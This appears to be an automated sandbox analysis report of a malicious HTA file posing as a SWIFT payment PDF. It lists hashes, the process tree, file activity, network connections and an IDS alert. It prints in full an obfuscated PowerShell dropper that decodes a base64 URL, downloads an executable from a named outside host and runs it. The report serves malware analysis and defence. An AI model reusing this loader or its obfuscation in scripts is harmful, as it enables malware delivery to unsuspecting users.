File name: | Swift Copyusd180000_pdf.hta |
Full analysis: | https://app.any.run/tasks/cbcc0834-e2cc-44b2-b015-4b0e9a8bfbd7 |
Verdict: | Malicious activity |
Analysis date: | July 11, 2019, 13:28:57 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/html |
File info: | HTML document, ASCII text, with very long lines, with CRLF, LF line terminators |
MD5: | 4649EE06E336170FD843122B15C3C0F5 |
SHA1: | E3FA0077A75AA0BAFCEEADA1A7857E99FC2B3BE3 |
SHA256: | 93BA9C1B36188A646B638834E3B323A94B3F8CB037C4399183D77865D4904C70 |
SSDEEP: | 384:xlJTuIXBrLlJTuIXBrVzlJTuIXBrJ9QlJTuIXBrgNsSIdvlJTuIXBrklJTuIXBrr:bJTvXBrJJTvXBrVhJTvXBrJ9EJTvXBro |
.html | | | HyperText Markup Language (100) |
---|
ContentType: | text/html; charset=utf-8 |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2956 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\Swift Copyusd180000_pdf.hta" | C:\Windows\System32\mshta.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2380 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$mogkues = Get-Random -Min 3 -Max 4;$mstfnpdxlqb = ([char[]]([char]97..[char]122));$xdvjgkn = -join ($mstfnpdxlqb | Get-Random -Count $mogkues | % {[Char]$_});$kydajzpsbc = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$oupiezbyv = $xdvjgkn + $kydajzpsbc;$yblvqjnguze=[char]0x53+[char]0x61+[char]0x4c;$qcuiev=[char]0x49+[char]0x45+[char]0x58;$czmajniwr=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jbgnfahpd $yblvqjnguze;$zswbftl=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jbgnfahpd aypskwmvhq $qcuiev;$bcofzydnte=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|aypskwmvhq;jbgnfahpd nrlqzad $czmajniwr;$wirnpmx = $bcofzydnte + [char]0x5c + $oupiezbyv;$uyhdokji = $xdvjgkn + '';$stzeijykhof = '';$stzeijykhof = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($stzeijykhof));$tewfaxgz = $env:PUBLIC + [char]0x5c + $uyhdokji;$zswbftl=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;$suhvylewt = New-Object $zswbftl;try{$kfdteubny = $suhvylewt.DownloadData($stzeijykhof)}catch{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kfdteubny = $suhvylewt.DownloadData($stzeijykhof)};[IO.File]::WriteAllBytes($tewfaxgz, $kfdteubny);nrlqzad $tewfaxgz;;;;$nwmicpveoh = 'aHR0cDovL2FsaWlmZi5jb20vYXBwL3dlYnJvb3QvZGF0ZS9pbmsuZXhl';$nwmicpveoh=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($nwmicpveoh));$xbdakwmf = New-Object $zswbftl;$vgiobrhu = $xbdakwmf.DownloadData($nwmicpveoh);[IO.File]::WriteAllBytes($wirnpmx, $vgiobrhu);nrlqzad $wirnpmx;;$uhapsnvxky = @($hlrov, $fyokgwdp, $vtlxc, $tnurqdxfeg);foreach($hwvxok in $uhapsnvxky){$null = $_}"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2380 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N54J3JPRHKARYZ3XDZNX.temp | — | |
MD5:— | SHA256:— | |||
2380 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
2380 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF100be9.TMP | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2380 | powershell.exe | GET | 302 | 95.168.186.145:80 | http://aliiff.com/app/webroot/date/ink.exe | NL | — | — | suspicious |
2380 | powershell.exe | GET | 301 | 95.168.186.145:80 | http://aliiff.com/home/errorpage | NL | html | 241 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2380 | powershell.exe | 95.168.186.145:80 | aliiff.com | — | NL | suspicious |
2380 | powershell.exe | 95.168.186.145:443 | aliiff.com | — | NL | suspicious |
Domain | IP | Reputation |
---|---|---|
aliiff.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2380 | powershell.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |